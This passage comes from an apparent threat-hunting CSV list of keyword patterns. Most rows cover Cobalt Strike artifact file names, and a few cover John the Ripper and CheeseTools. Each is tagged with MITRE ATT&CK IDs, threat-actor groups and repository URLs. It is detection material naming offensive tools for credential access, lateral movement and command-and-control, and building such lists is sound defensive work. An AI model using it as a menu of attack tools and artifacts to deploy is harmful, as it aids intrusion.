assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced 
adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact32big.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32big.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact32svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64*.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 
- T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact64.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifact64.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64big.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64big.x64.dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifact64svcbig.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*artifactbig64.exe*","offensive_tool_keyword","cobaltstrike","default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. 
Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*artifactuac*.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*aruba2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AS 'Login that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*as 'Owner that can be impersonated'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" 